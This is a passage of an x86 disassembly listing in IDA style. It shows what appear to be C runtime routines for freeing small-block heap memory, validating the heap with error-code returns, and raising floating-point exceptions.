mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_418E07
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_418DDE
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418DD1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_418DD1: ; CODE XREF: sub_418B22+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_418E03
; ---------------------------------------------------------------------------
loc_418DDE: ; CODE XREF: sub_418B22+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418DF4
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_418DF4: ; CODE XREF: sub_418B22+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_418E03: ; CODE XREF: sub_418B22+2BA�j
shr edx, cl
or [eax], edx
loc_418E07: ; CODE XREF: sub_418B22+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_418E10: ; CODE XREF: sub_418B22+1A2�j
; sub_418B22:loc_418CD0�j
push 1
pop eax
loc_418E13: ; CODE XREF: sub_418B22+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_418B22 endp
; ---------------------------------------------------------------------------
mov eax, dword_494260
test eax, eax
jz locret_418EE8
mov ecx, dword_494258
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:dword_495458 ; VirtualFree
mov ecx, dword_494258
mov eax, dword_494260
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_494260
mov ecx, dword_494258
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_494260
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_494260
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_418E8F
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_494260
loc_418E8F: ; CODE XREF: .text:00418E84�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_418EE1
cmp dword_494264, 1
jle short loc_418EE1
push dword ptr [eax+10h]
push 0
push dword_49426C
call ds:dword_49542C ; RtlFreeHeap
mov eax, dword_494264
mov edx, dword_494268
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_494260
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_416430
add esp, 0Ch
dec dword_494264
loc_418EE1: ; CODE XREF: .text:00418E93�j
; .text:00418E9C�j
and dword_494260, 0
locret_418EE8: ; CODE XREF: .text:00418E1F�j
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_494264
push ebx
push esi
push edi
lea eax, [eax+eax*4]
shl eax, 2
push eax
push dword_494268
call ds:dword_495460 ; IsBadWritePtr
test eax, eax
jz short loc_418F19
or eax, 0FFFFFFFFh
jmp loc_4191D6
; ---------------------------------------------------------------------------
loc_418F19: ; CODE XREF: .text:00418F0F�j
mov ebx, dword_494268
xor edi, edi
cmp dword_494264, edi
mov [ebp-38h], ebx
mov [ebp-20h], edi
jle loc_4191D4
jmp short loc_418F37
; ---------------------------------------------------------------------------
loc_418F35: ; CODE XREF: .text:004191CE�j
xor edi, edi
loc_418F37: ; CODE XREF: .text:00418F33�j
mov esi, [ebx+10h]
push 41C4h
push esi
call ds:dword_495460 ; IsBadWritePtr
test eax, eax
jnz loc_4191DB
mov eax, [ebx+0Ch]
mov [ebp-2Ch], edi
mov [ebp-0Ch], eax
lea eax, [esi+144h]
mov [ebp-28h], eax
mov eax, [ebx+8]
add esi, 0C4h
mov [ebp-14h], eax
mov [ebp-18h], edi
mov [ebp-30h], edi
mov [ebp-3Ch], esi
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F77: ; CODE XREF: .text:004191A7�j
xor edi, edi
loc_418F79: ; CODE XREF: .text:00418F75�j
push 40h
mov [ebp-24h], edi
mov [ebp-1Ch], edi
mov [ebp-4], edi
xor eax, eax
pop ecx
cmp [ebp-14h], eax
lea edi, [ebp-13Ch]
rep stosd
jl loc_419172
push 8000h
push dword ptr [ebp-0Ch]
call ds:dword_495460 ; IsBadWritePtr
test eax, eax
jnz loc_4191DF
mov eax, [ebp-0Ch]
xor ebx, ebx
lea edx, [eax+0FFCh]
loc_418FB9: ; CODE XREF: .text:0041904D�j
cmp dword ptr [edx-0FF4h], 0FFFFFFFFh
lea esi, [edx-0FF0h]
jnz loc_4191EF
cmp dword ptr [edx], 0FFFFFFFFh
jnz loc_4191EF
loc_418FD5: ; CODE XREF: .text:0041903B�j
mov ecx, [esi]
test cl, 1
mov edi, ecx
jz short loc_418FF0
dec ecx
cmp ecx, 400h
jg loc_4191E3
inc dword ptr [ebp-4]
jmp short loc_41900C
; ---------------------------------------------------------------------------
loc_418FF0: ; CODE XREF: .text:00418FDC�j
mov eax, ecx
sar eax, 4
dec eax
cmp eax, 3Fh
jle short loc_418FFE
push 3Fh
pop eax
loc_418FFE: ; CODE XREF: .text:00418FF9�j
inc dword ptr [ebp+eax*4-13Ch]
lea eax, [ebp+eax*4-13Ch]
loc_41900C: ; CODE XREF: .text:00418FEE�j
cmp ecx, 10h
jl loc_4191EB
test cl, 0Fh
jnz loc_4191EB
cmp ecx, 0FF0h
jg loc_4191EB
cmp [ecx+esi-4], edi
lea eax, [ecx+esi]
jnz loc_4191E7
mov esi, eax
cmp esi, edx
jb short loc_418FD5
jnz loc_4191E7
add edx, 1000h
inc ebx
cmp ebx, 8
jl loc_418FB9
mov esi, [ebp-28h]
mov eax, [ebp-4]
cmp [esi], eax
jnz loc_4191F3
and dword ptr [ebp-8], 0
lea eax, [ebp-13Ch]
mov [ebp-4], eax
loc_41906E: ; CODE XREF: .text:00419166�j
mov eax, [esi+4]
and dword ptr [ebp-10h], 0
lea edi, [esi+8]
mov edx, esi
cmp eax, esi
mov [ebp-34h], edx
jz loc_41913A
loc_419085: ; CODE XREF: .text:00419107�j
mov ebx, [ebp-4]
mov ecx, [ebp-10h]
cmp ecx, [ebx]
jz short loc_41910D
mov ecx, [ebp-0Ch]
cmp eax, ecx
jb loc_419203
add ecx, 8000h
cmp eax, ecx
jnb loc_419203
mov ecx, eax
and cx, 0F000h
add ecx, 0Ch
lea edx, [ecx+0FF0h]
cmp ecx, edx
jz loc_4191F7
loc_4190C0: ; CODE XREF: .text:004190CD�j
cmp ecx, eax
jz short loc_4190CF
mov ebx, [ecx]
and ebx, 0FFFFFFFEh
add ecx, ebx
cmp ecx, edx
jnz short loc_4190C0
loc_4190CF: ; CODE XREF: .text:004190C2�j
cmp ecx, edx
jz loc_4191F7
mov ecx, [eax]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
jle short loc_4190E5
push 3Fh
pop ecx
loc_4190E5: ; CODE XREF: .text:004190E0�j
cmp ecx, [ebp-8]
jnz loc_4191FB
mov ecx, [ebp-34h]
cmp [eax+8], ecx
jnz loc_4191FF
inc dword ptr [ebp-10h]
mov edx, eax
mov eax, [eax+4]
mov [ebp-34h], edx
cmp eax, esi
jnz loc_419085
loc_41910D: ; CODE XREF: .text:0041908D�j
cmp dword ptr [ebp-10h], 0
jz short loc_41913A
mov ecx, [ebp-8]
cmp ecx, 20h
jge short loc_41912A
mov eax, 80000000h
shr eax, cl
or [ebp-24h], eax
or [ebp-2Ch], eax
jmp short loc_41913A
; ---------------------------------------------------------------------------
loc_41912A: ; CODE XREF: .text:00419119�j
add ecx, 0FFFFFFE0h
mov eax, 80000000h
shr eax, cl
or [ebp-1Ch], eax
or [ebp-18h], eax
loc_41913A: ; CODE XREF: .text:0041907F�j
; .text:00419111�j ...
cmp [edx+4], esi
jnz loc_41920B
mov ecx, [ebp-4]
mov eax, [ebp-10h]
cmp eax, [ecx]
jnz loc_41920B
cmp [edi], edx
jnz loc_419207
inc dword ptr [ebp-8]
add dword ptr [ebp-4], 4
cmp dword ptr [ebp-8], 40h
mov esi, edi
jl loc_41906E
mov esi, [ebp-3Ch]
mov ebx, [ebp-38h]
loc_419172: ; CODE XREF: .text:00418F92�j
mov eax, [ebp-24h]
cmp eax, [esi-80h]
jnz loc_41920F
mov eax, [ebp-1Ch]
cmp eax, [esi]
jnz loc_41920F
add dword ptr [ebp-0Ch], 8000h
add dword ptr [ebp-28h], 204h
shl dword ptr [ebp-14h], 1
inc dword ptr [ebp-30h]
add esi, 4
cmp dword ptr [ebp-30h], 20h
mov [ebp-3Ch], esi
jl loc_418F77
mov eax, [ebp-2Ch]
cmp eax, [ebx]
jnz short loc_419213
mov eax, [ebp-18h]
cmp eax, [ebx+4]
jnz short loc_419213
add ebx, 14h
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov [ebp-38h], ebx
cmp eax, dword_494264
jl loc_418F35
loc_4191D4: ; CODE XREF: .text:00418F2D�j
xor eax, eax
loc_4191D6: ; CODE XREF: .text:00418F14�j
; .text:00419216�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4191DB: ; CODE XREF: .text:00418F48�j
push 0FFFFFFFEh
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191DF: ; CODE XREF: .text:00418FA8�j
push 0FFFFFFFCh
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191E3: ; CODE XREF: .text:00418FE5�j
push 0FFFFFFFAh
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191E7: ; CODE XREF: .text:00419031�j
; .text:0041903D�j
push 0FFFFFFF8h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191EB: ; CODE XREF: .text:0041900F�j
; .text:00419018�j ...
push 0FFFFFFF9h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191EF: ; CODE XREF: .text:00418FC6�j
; .text:00418FCF�j
push 0FFFFFFFBh
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191F3: ; CODE XREF: .text:0041905B�j
push 0FFFFFFF7h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191F7: ; CODE XREF: .text:004190BA�j
; .text:004190D1�j
push 0FFFFFFF5h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191FB: ; CODE XREF: .text:004190E8�j
push 0FFFFFFF4h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_4191FF: ; CODE XREF: .text:004190F4�j
push 0FFFFFFF3h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_419203: ; CODE XREF: .text:00419094�j
; .text:004190A2�j
push 0FFFFFFF6h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_419207: ; CODE XREF: .text:00419153�j
push 0FFFFFFF1h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_41920B: ; CODE XREF: .text:0041913D�j
; .text:0041914B�j
push 0FFFFFFF2h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_41920F: ; CODE XREF: .text:00419178�j
; .text:00419183�j
push 0FFFFFFF0h
jmp short loc_419215
; ---------------------------------------------------------------------------
loc_419213: ; CODE XREF: .text:004191B2�j
; .text:004191BA�j
push 0FFFFFFEFh
loc_419215: ; CODE XREF: .text:004191DD�j
; .text:004191E1�j ...
pop eax
jmp short loc_4191D6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_419218(int,int,double,int)
sub_419218 proc near ; CODE XREF: sub_415D9B+51�p
; sub_415EF3+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_4361C8, 0
jnz short loc_41924D
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_4198D1
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41924D: ; CODE XREF: sub_419218+A�j
push 0FFFFh
mov dword_4927F4, 21h
push [ebp+arg_C]
call sub_419BA8
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_419218 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
fld qword ptr [ebp+0Ch]
fadd qword ptr [ebp+14h]
cmp dword_4361C8, 0
fstp qword ptr [ebp-8]
jnz short loc_4192AC
push dword ptr [ebp+1Ch]
fld qword ptr [ebp-8]
push ecx
push ecx
fstp qword ptr [esp]
fld qword ptr [ebp+14h]
push ecx
push ecx
fstp qword ptr [esp]
fld qword ptr [ebp+0Ch]
push ecx
push ecx
fstp qword ptr [esp]
push dword ptr [ebp+8]
push 1
call sub_4198D1
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_4192AC: ; CODE XREF: .text:00419280�j
push 0FFFFh
mov dword_4927F4, 21h
push dword ptr [ebp+1Ch]
call sub_419BA8
fld qword ptr [ebp-8]
pop ecx
pop ecx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4192CA(int,int,double,double,int)
sub_4192CA proc near ; CODE XREF: sub_415D9B:loc_415E5E�p
; sub_415EF3:loc_415FB6�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_4196BA
add esp, 0Ch
test eax, eax
jnz short loc_419308
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_419407
add esp, 18h
loc_419308: ; CODE XREF: sub_4192CA+1A�j
push [ebp+arg_0]
call sub_4199A4
cmp dword_4361C8, 0
pop ecx
jnz short loc_419346
test eax, eax
jz short loc_419346
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_4198D1
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_419346: ; CODE XREF: sub_4192CA+4E�j
; sub_4192CA+52�j
push eax
call sub_419959
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_419BA8
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_4192CA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 58h
push dword ptr [ebp+28h]
lea eax, [ebp+20h]
push eax
push dword ptr [ebp+8]
call sub_4196BA
add esp, 0Ch
test eax, eax
jnz short loc_4193AC
mov eax, [ebp-20h]
and al, 0E3h
or al, 3
mov [ebp-20h], eax
lea eax, [ebp+20h]
push eax
lea eax, [ebp+10h]
push eax
lea eax, [ebp+28h]
push dword ptr [ebp+0Ch]
fld qword ptr [ebp+18h]
push dword ptr [ebp+8]
fstp qword ptr [ebp-30h]
push eax
lea eax, [ebp-58h]
push eax
call sub_419407
add esp, 18h
loc_4193AC: ; CODE XREF: .text:0041937C�j
push dword ptr [ebp+8]
call sub_4199A4
cmp dword_4361C8, 0
pop ecx
jnz short loc_4193EB
test eax, eax
jz short loc_4193EB
push dword ptr [ebp+28h]
fld qword ptr [ebp+20h]
push ecx
push ecx
fstp qword ptr [esp]
fld qword ptr [ebp+18h]
push ecx
push ecx
fstp qword ptr [esp]
fld qword ptr [ebp+10h]
push ecx
push ecx
fstp qword ptr [esp]
push dword ptr [ebp+0Ch]
push eax
call sub_4198D1
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_4193EB: ; CODE XREF: .text:004193BC�j
; .text:004193C0�j
push eax
call sub_419959
mov dword ptr [esp], 0FFFFh
push dword ptr [ebp+28h]
call sub_419BA8
fld qword ptr [ebp+20h]
pop ecx
pop ecx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419407 proc near ; CODE XREF: sub_4192CA+36�p
; .text:004193A4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_419439
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_419439: ; CODE XREF: sub_419407+23�j
test cl, 2
jz short loc_41944C
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_41944C: ; CODE XREF: sub_419407+35�j
test cl, bl
jz short loc_41945E
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_41945E: ; CODE XREF: sub_419407+47�j
test cl, 4
jz short loc_419471
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_419471: ; CODE XREF: sub_419407+5A�j
test cl, 8
jz short loc_419484
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_419484: ; CODE XREF: sub_419407+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_419B8B
test al, bl
jz short loc_41950D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41950D: ; CODE XREF: sub_419407+FD�j
test al, 4
jz short loc_419518
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_419518: ; CODE XREF: sub_419407+108�j
test al, 8
jz short loc_419523
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_419523: ; CODE XREF: sub_419407+113�j
test al, 10h
jz short loc_41952D
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41952D: ; CODE XREF: sub_419407+11E�j
test al, 20h
jz short loc_419537
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_419537: ; CODE XREF: sub_419407+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_419576
cmp eax, 400h
jz short loc_419568
cmp eax, 800h
jz short loc_41955C
cmp eax, ecx
jnz short loc_41957C
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41957C
; ---------------------------------------------------------------------------
loc_41955C: ; CODE XREF: sub_419407+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_419572
; ---------------------------------------------------------------------------
loc_419568: ; CODE XREF: sub_419407+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_419572: ; CODE XREF: sub_419407+15F�j
mov [eax], ecx
jmp short loc_41957C
; ---------------------------------------------------------------------------
loc_419576: ; CODE XREF: sub_419407+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41957C: ; CODE XREF: sub_419407+14B�j
; sub_419407+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_4195A7
cmp eax, 200h
jz short loc_41959A
cmp eax, ecx
jnz short loc_4195B4
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_4195B4
; ---------------------------------------------------------------------------
loc_41959A: ; CODE XREF: sub_419407+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_4195B2
; ---------------------------------------------------------------------------
loc_4195A7: ; CODE XREF: sub_419407+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_4195B2: ; CODE XREF: sub_419407+19E�j
mov [eax], ecx
loc_4195B4: ; CODE XREF: sub_419407+189�j
; sub_419407+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_419B99
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_49544C ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41962E
and dword ptr [esi], 0FFFFFFFEh
loc_41962E: ; CODE XREF: sub_419407+222�j
test byte ptr [eax+8], 8
jz short loc_419637
and dword ptr [esi], 0FFFFFFFBh
loc_419637: ; CODE XREF: sub_419407+22B�j
test byte ptr [eax+8], 4
jz short loc_419640
and dword ptr [esi], 0FFFFFFF7h
loc_419640: ; CODE XREF: sub_419407+234�j
test byte ptr [eax+8], 2
jz short loc_419649
and dword ptr [esi], 0FFFFFFEFh
loc_419649: ; CODE XREF: sub_419407+23D�j
test [eax+8], bl
jz short loc_419651
and dword ptr [esi], 0FFFFFFDFh
loc_419651: ; CODE XREF: sub_419407+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_419685
dec ecx
jz short loc_419679
dec ecx
jz short loc_41966F
dec ecx
jnz short loc_419687
or byte ptr [esi+1], 0Ch
jmp short loc_419687
; ---------------------------------------------------------------------------
loc_41966F: ; CODE XREF: sub_419407+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_419681
; ---------------------------------------------------------------------------
loc_419679: ; CODE XREF: sub_419407+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_419681: ; CODE XREF: sub_419407+270�j
mov [esi], ecx
jmp short loc_419687
; ---------------------------------------------------------------------------
loc_419685: ; CODE XREF: sub_419407+257�j
and [esi], edx
loc_419687: ; CODE XREF: sub_419407+260�j
; sub_419407+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_4196A7
dec ecx
jz short loc_41969E
dec ecx
jnz short loc_4196B0
and [esi], edx
jmp short loc_4196B0
; ---------------------------------------------------------------------------
loc_41969E: ; CODE XREF: sub_419407+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_4196AE
; ---------------------------------------------------------------------------
loc_4196A7: ; CODE XREF: sub_419407+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_4196AE: ; CODE XREF: sub_419407+29E�j
mov [esi], ecx
loc_4196B0: ; CODE XREF: sub_419407+291�j
; sub_419407+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419407 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196BA proc near ; CODE XREF: sub_4192CA+10�p
; .text:00419372�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_4196E5
test byte ptr [ebp+arg_8], bl
jz short loc_4196E5
push ebx
call sub_419BCB
pop ecx
and edi, 0FFFFFFF7h
jmp loc_4198AF
; ---------------------------------------------------------------------------
loc_4196E5: ; CODE XREF: sub_4196BA+15�j
; sub_4196BA+1A�j
test al, 4
jz short loc_4196FF
test byte ptr [ebp+arg_8], 4
jz short loc_4196FF
push 4
call sub_419BCB
pop ecx
and edi, 0FFFFFFFBh
jmp loc_4198AF
; ---------------------------------------------------------------------------
loc_4196FF: ; CODE XREF: sub_4196BA+2D�j
; sub_4196BA+33�j
test al, bl
jz loc_4197D9
test byte ptr [ebp+arg_8], 8
jz loc_4197D9
push 8
call sub_419BCB
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_4197B1
cmp ecx, 400h
jz short loc_419789
cmp ecx, 800h
jz short loc_419761
cmp ecx, eax
jnz loc_4197D1
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_4276F0
fld dbl_435BB8
fnstsw ax
sahf
ja short loc_419759
fchs
loc_419759: ; CODE XREF: sub_4196BA+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_4197CF
; ---------------------------------------------------------------------------
loc_419761: ; CODE XREF: sub_4196BA+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_4276F0
fnstsw ax
sahf
jbe short loc_419779
fld dbl_435BA8
jmp short loc_419781
; ---------------------------------------------------------------------------
loc_419779: ; CODE XREF: sub_4196BA+B5�j
fld dbl_435BB8
fchs
loc_419781: ; CODE XREF: sub_4196BA+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_4197CF
; ---------------------------------------------------------------------------
loc_419789: ; CODE XREF: sub_4196BA+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_4276F0
fnstsw ax
sahf
jbe short loc_4197A1
fld dbl_435BB8
jmp short loc_4197A9
; ---------------------------------------------------------------------------
loc_4197A1: ; CODE XREF: sub_4196BA+DD�j
fld dbl_435BA8
fchs
loc_4197A9: ; CODE XREF: sub_4196BA+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_4197CF
; ---------------------------------------------------------------------------
loc_4197B1: ; CODE XREF: sub_4196BA+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_4276F0
fld dbl_435BA8
fnstsw ax
sahf
ja short loc_4197C9
fchs
loc_4197C9: ; CODE XREF: sub_4196BA+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_4197CF: ; CODE XREF: sub_4196BA+A5�j
; sub_4196BA+CD�j ...
fstp qword ptr [ecx]
loc_4197D1: ; CODE XREF: sub_4196BA+81�j
and edi, 0FFFFFFFEh
jmp loc_4198AF
; ---------------------------------------------------------------------------
loc_4197D9: ; CODE XREF: sub_4196BA+47�j
; sub_4196BA+51�j
test al, 2
jz loc_4198AF
test byte ptr [ebp+arg_8], 10h
jz loc_4198AF
push esi
xor esi, esi
test al, 10h
jz short loc_4197F4
mov esi, ebx
loc_4197F4: ; CODE XREF: sub_4196BA+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_4276F0
fnstsw ax
sahf
jz loc_41989D
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_419ACA
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41983F
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_419893
; ---------------------------------------------------------------------------
loc_41983F: ; CODE XREF: sub_4196BA+17A�j
